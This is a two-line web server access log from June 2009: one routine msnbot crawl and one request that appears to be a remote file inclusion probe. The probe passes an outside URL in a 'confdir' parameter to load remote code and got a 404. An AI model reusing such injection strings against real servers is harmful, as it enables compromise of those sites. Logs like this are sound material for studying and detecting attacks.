65.55.106.239 - - [27/Jun/2009:15:24:23 -0500] "GET /logs/access_log.1116720000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.98.209.71 - - [27/Jun/2009:15:26:49 -0500] "GET //script/_conf/core/common-tpl-vars.php?confdir=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
